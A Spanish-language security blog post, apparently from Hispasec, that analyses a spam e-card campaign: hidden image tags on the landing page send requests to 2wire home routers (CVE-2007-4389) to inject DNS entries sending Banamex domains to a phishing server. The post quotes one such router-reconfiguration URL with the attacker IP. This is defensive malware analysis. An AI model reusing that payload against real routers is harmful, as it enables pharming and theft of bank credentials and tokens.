Nuevo método de fraude bancario

Esta tarde, entre el spam, he recibido este mensaje:

Nada más verlo pensé en uno de esos troyanos que intentan pasar por una postal virtual. Lo hubiera borrado de inmediato, pero me llamó la atención que en el mensaje, explícitamente, advierte al usuario de precisamente eso, de que algunos correos en realidad intentan descargar un ejecutable para robar tu información. Así que visité el enlace, que como puede observarse no te lleva a mexico.gusanito.com como aparecen en el HTML, sino a otra dirección:

Como se aprecia, es una copia de una típica postal virtual en flash, a priori inofensiva. Si bien seguía resultando extraño que alguien se molestara en hacer un spam de un flash que te lleve a una tercera web que no se corresponde con el sitio original de la postal virtual. Así que mi teoría es que la página web tendría algún tipo de exploit para intentar descargar el ejecutable/troyano dependiendo de las vulnerabilidades del navegador.

Pero, al examinar el código de la página en cuestión, al final, me encuentro con ésto:

Como se puede apreciar, a través de etiquetas HTML de imágenes, como si intentara enlazar algún gráfico, hace referencias a URLs locales. Por ejemplo, la que he resaltado en la captura es tal que:
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=69.64.40.12"

La instrucción se repite con otras URLs, haciendo referencias a IPs locales/privadas, como 192.168.1.254 ó 176.16.0.1. En todas hay algo en común, asocia dominios del banco Banamex a la IP 69.64.40.12. ¿Qué están haciendo?

Pues la deducción más obvia es que están intentando, a través de esas URLs, modificar la configuración de ciertos modelos de router/gateway que puedan tener los usuarios, de forma que cuando intenten visitar la web de Banamex, cuya IP legítima es 192.193.230.100, los redirija a otra IP diferente (69.64.40.12) en cuyo servidor web han hospedado una copia de la web de Banamex que en realidad es una página de phishing para robar los usuarios y contraseñas introducidos por los usuarios.

Por ejemplo, aquí la captura de pantalla de una de esas páginas de phishing donde piden, además del usuario y password, la clave dinámica del token de Banamex para poder realizar transacciones:

Estamos ante un ataque de pharming que aprovecha las debilidades de los routers de los usuarios (bien configuración débil sin autenticación por defecto, bien vulnerabilidades) para redirigir automáticamente sus conexiones a un banco hacia una web de phishing. Las direcciones privadas de los routers a las que apuntan las URLs del ataque no estan visibles desde Internet, ya que de lo contrario cualquiera podría modificarlas desde el exterior. Por eso el atacante necesita que esas URLs se ejecuten desde la máquina del usuario, y la forma de conseguirlo es a través de una página web que, además de visitar contenidos de Internet, hace peticiones a direcciones internas.

Mientras escribo estas líneas tengo que salir, cuando vuelva esta noche espero poder concretar los modelos de dispositivos a los que afectan dichas peticiones, así que actualizaré esta entrada o lo haré en los comentarios. Si algún alma caritativa quiere echar una mano (google puede ser un buen aliado), por favor que escriba en los comentarios sus descubrimientos (modelos a los que puede afectar dichas URLs). Gracias.

P.D.: Si visitáis la página web de la tarjeta virtual para ver el código fuente y todas las URLs de ataque, tener precaución de que no tengáis ningún router vulnerable o que no sois clientes de Banamex :)

Actualización a las 22:05 Ya he vuelto. He echado un vistazo, y las URLs corresponden a Routers/gateways de 2wire, modelos 1701HG, 1800HW, 2071 Gateway, que están siendo instalados sin password por defecto en México. Se trata de una vulnerabilidad conocida y documentada, más información en CVE-2007-4389. Las URLs del ataque lo que hacen es inyectar nuevas entradas en el DNS del dispositivo, de forma que, como comentábamos, cuando el usuario visita uno de los dominios de Banamex el router resuelve la IP inyectada y lo lleva a la página de phishing de forma transparente (el usuario verá en su navegador la URL correcta de Banamex, pero en realidad estará viendo la página falsa de phishing hospedada en el servidor web de la IP inyectada).

Fuente: http://blog.hispasec.com/laboratorio/255

Suscríbete a nuestro Boletín